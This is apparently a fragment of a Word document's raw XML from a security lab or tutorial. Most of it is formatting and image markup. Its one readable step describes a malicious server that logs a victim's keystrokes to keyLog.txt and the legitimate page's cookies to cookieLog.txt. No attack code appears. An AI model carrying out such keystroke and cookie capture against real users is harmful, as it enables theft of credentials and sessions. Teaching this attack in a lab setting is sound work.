    <w:p w14:paraId="381BFB3F" w14:textId="2FFE5337" w:rsidR="003A72B6" w:rsidRPr="003A72B6" w:rsidRDefault="00AD484A" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45C76494" wp14:editId="18418078">
            <wp:extent cx="3437124" cy="2572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8776" cy="2618519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C403D1" w14:textId="77777777" w:rsidR="003A72B6" w:rsidRPr="003A72B6" w:rsidRDefault="003A72B6" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, type anything while on the page and the key strokes will be saved in the file </w:t>
      </w:r>
      <w:r w:rsidRPr="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>keyLog.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the malicious server’s directory along with the cookies of the webpage provided by the legitimate webserver in the file </w:t>
      </w:r>
      <w:r w:rsidRPr="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>cookieLog.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003A72B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A416D" w14:textId="15CA229A" w:rsidR="003A72B6" w:rsidRPr="003A72B6" w:rsidRDefault="003A72B6" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CCD78CF" wp14:editId="6F0BCACF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2973705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2847975" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21287"/>
                <wp:lineTo x="21528" y="21287"/>
                <wp:lineTo x="215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7975" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31FB3E3A" wp14:editId="516EC23B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>462224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2390775" cy="1981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0775" cy="1981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA444A" w14:textId="6407AECF" w:rsidR="003A72B6" w:rsidRPr="00D03EA4" w:rsidRDefault="003A72B6" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003A72B6" w:rsidRPr="00D03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718"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4014D3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6044A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="535082CE"/>
    <w:lvl w:ilvl="0" w:tplc="D9263A9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E2"/>
    <w:rsid w:val="00032376"/>
    <w:rsid w:val="00050DA9"/>
    <w:rsid w:val="001047EE"/>
    <w:rsid w:val="00202DB3"/>
    <w:rsid w:val="003A72B6"/>
    <w:rsid w:val="004220A7"/>
    <w:rsid w:val="00545728"/>
    <w:rsid w:val="00580F41"/>
    <w:rsid w:val="005C3EA1"/>
    <w:rsid w:val="0061435F"/>
    <w:rsid w:val="00645BE7"/>
    <w:rsid w:val="00674A20"/>
    <w:rsid w:val="006938E2"/>
    <w:rsid w:val="00786136"/>
    <w:rsid w:val="007C717E"/>
    <w:rsid w:val="009F0A9B"/>
    <w:rsid w:val="00AD484A"/>
    <w:rsid w:val="00B265BB"/>
    <w:rsid w:val="00D03EA4"/>
    <w:rsid w:val="00D529A0"/>
    <w:rsid w:val="00D66CED"/>
    <w:rsid w:val="00F71C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3472"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DFB33505-0ED3-4B23-8BD3-99C37E54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376"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A72B6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A7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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-04T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-05T18:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>